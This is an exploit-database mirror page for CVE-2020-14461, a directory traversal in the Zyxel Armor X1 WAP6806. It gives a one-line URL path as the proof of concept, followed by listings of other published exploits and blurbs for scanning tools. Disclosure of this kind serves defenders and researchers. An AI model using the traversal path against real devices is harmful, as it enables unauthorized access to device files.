"Zyxel Armor X1 WAP6806 - Directory Traversal"

Author

Exploit author

"Rajivarnan R"

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-07-15

 Download file
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Date: 2020-06-19
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software [http://www.zyxelguard.com/WAP6806.asp]
# Version: [V1.00(ABAL.6)C0]
# CVE: 2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]

# As a result of the research, one vulnerability identified. 
# (Directory Traversal)
# Technical information is provided below step by step.

# [1] - Directory Traversal Vulnerability

# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]

# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
<https://target/Zyxel/images/eaZy/>

Release Date	Title	Type	Platform	Author
2020-08-05	"ACTi NVR3 Standard or Professional Server 3.0.12.42 - Denial of Service (PoC)"	dos	windows	MegaMagnus
2020-08-05	"Stock Management System 1.0 - Authentication Bypass"	webapps	php	"Adeeb Shah"
2020-08-05	"QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-08-04	"Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-08-04	"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)"	webapps	python	"Luis Vacacas"
2020-08-04	"Daily Expenses Management System 1.0 - 'username' SQL Injection"	webapps	php	"Daniel Ortiz"
2020-08-04	"RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)"	dos	windows	"Luis Martínez"
2020-07-30	"Online Shopping Alphaware 1.0 - Authentication Bypass"	webapps	php	"Ahmed Abbas"
2020-07-29	"Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting"	webapps	php	"Jinson Varghese Behanan"
2020-07-29	"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion"	webapps	hardware	0xmmnbassel

Release Date	Title	Type	Platform	Author
2020-07-29	"Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion"	webapps	hardware	0xmmnbassel
2020-07-28	"Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion"	webapps	hardware	0xmmnbassel
2020-07-26	"UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	LiquidWorm
2020-07-26	"F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion"	webapps	hardware	"Carlos E. Vieira"
2020-07-23	"UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass"	webapps	hardware	LiquidWorm
2020-07-15	"Zyxel Armor X1 WAP6806 - Directory Traversal"	webapps	hardware	"Rajivarnan R"
2020-07-15	"SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	"Metin Yunus Kandemir"
2020-07-08	"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)"	webapps	hardware	"Metin Yunus Kandemir"
2020-07-08	"BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)"	webapps	hardware	"William Summerhill"
2020-07-07	"Sickbeard 0.1 - Remote Command Injection"	webapps	hardware	bdrake

Release Date	Title	Type	Platform	Author
2020-07-15	"Zyxel Armor X1 WAP6806 - Directory Traversal"	webapps	hardware	"Rajivarnan R"

import requests

response = requests.get('https://www.nmmapper.com/api/exploitdetails/48669/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Search for hundreds of thousands of exploits

"Zyxel Armor X1 WAP6806 - Directory Traversal"

Download file

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.